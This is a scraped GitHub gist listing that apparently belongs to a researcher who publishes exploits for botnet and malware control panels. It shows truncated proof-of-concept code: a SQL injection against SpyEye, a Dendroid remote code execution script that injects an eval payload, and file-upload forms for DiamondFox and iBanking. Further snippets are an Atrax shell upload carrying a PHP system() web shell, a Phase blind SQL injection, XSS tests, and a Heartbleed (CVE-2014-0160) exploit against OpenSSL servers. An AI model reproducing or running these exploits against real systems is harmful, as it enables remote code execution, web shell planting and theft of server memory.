Skip to content

Instantly share code, notes, and snippets.

@Xyl2k
Xyl2k / spyeye.php
Created Nov 21, 2019
old sploit release
View spyeye.php
<?php
/**
* Product : SpyEye Form Grabber
* Type : SQL Injection
* File : mod_savecert.php
* Cybercrime-tracker.net, 2013!
*/
?>
<html>
View Keitaro TDS Auth bypass v6.x - v7.7.10
____/\_____/\____/\____/\____/\____/\____/\__/\____/\____/\
/ ___/ / / - _/ __ / __ / ___/ __ / / / ___/\
/ / /__ __/ - / _/_/ _/ / / _/ / / / / _/__\/
/_____/ /___//_____/_____/__/__/_____/__/__/___/_/_/_/_____/\nf!
\_____\/\___\\_____\_____\__\__\_____\__\__\___\_\_\_\_____\/
C Y B E R C R i M E W H Q
Keitaro TDS Auth bypass v6.x - v7.7.10
@Xyl2k
Xyl2k / heartbleed.py
Created Feb 16, 2016
Python Heartbleed (CVE-2014-0160) Proof of Concept
View heartbleed.py
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# Edited spl0it to loop and save cookies.
import sys
import struct
import socket
import time
@Xyl2k
Xyl2k / kek.py
Last active May 31, 2021
Dendroid remote code execution
View kek.py
import requests
# Add URL
# Set a PHP payload
# Go to http://website/config.php
URL = 'http://localhost/Panel/applysettings.php'
PAYLOAD = "(isset($_GET['tapz'])) ? eval($_GET['tapz']) : '"
data = {
@Xyl2k
Xyl2k / pwn.html
Created Jun 17, 2015
Gorynych/DiamondFox v4.2.0.257- File Upload Vulnerability
View pwn.html
<!DOCTYPE html>
<html>
<head>
<title>Gorynych v4.2.0.257- File Upload Vulnerability</title>
<!-- Panel.zip hash: e698cf7cc57b20c02fce6de83299b75b -->
</head>
<body>
<h1>&#9673; Gorynych/DiamondFox v4.2.0.257 - File Upload Vulnerability &#9673;</h1>
<form action="http://localhost/Panel/post.php" method="POST" enctype="multipart/form-data">
<input type="file" name="upload1">
@Xyl2k
Xyl2k / eye.py
Created Feb 8, 2015
SpyEye frmcp2 xss
View eye.py
# SpyEye version ? reflected XSS POC
# Xartrick
# Xylitol
import urllib
import urllib2
# Configuration ...
sPayload = '<script>alert(1);</script>'
@Xyl2k
Xyl2k / pwn.php
Created Dec 23, 2014
Phase botnet blind SQL injection vulnerability
View pwn.php
<?php
// Start with PHP CLI (php pwn.php)
set_time_limit(0);
// Adjust this :)
define('SLEEP_TIME', '4');
define('PAGE_TIME', 4);
define('URL', 'http://localhost/Phase/');
echo('attacking ' . URL . PHP_EOL);
@Xyl2k
Xyl2k / Atrax Botnet Shell Upload Vulnerability
Created Nov 25, 2014
Atrax Botnet Shell Upload Vulnerability
View Atrax Botnet Shell Upload Vulnerability
import random
import string
import base64
import urllib
import urllib2
# <CONFIG>
payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>'
url = 'http://localhost/atrax/'
# </CONFIG>
@Xyl2k
Xyl2k / gist:9a75b885766ae0fc6046
Created Oct 6, 2014
iBanking panel upload vulnerability
View gist:9a75b885766ae0fc6046
<!-- iBanking panel upload vulnerability -->
<!-- get.php?p=..&i=.&f=dbconfig.php -->
<form method="POST" action="http://localhost/smsbot/sendFile.php" enctype="multipart/form-data">
FiLEZ: <input type="file" name="uploadedfile" /><br />
<input type="hidden" name="bot_id" value="500" />
<input type="hidden" name="imei" value="000000000000000" />
<input type="submit" value="Pwn" />
</form>
View Soraya XSS Vulnerability
import requests
import time
def StrToHex(string):
hex_str=''
for char in string:
int_char = ord(char)
hex_num = hex(int_char).lstrip("0x")
hex_str+=hex_num
return hex_str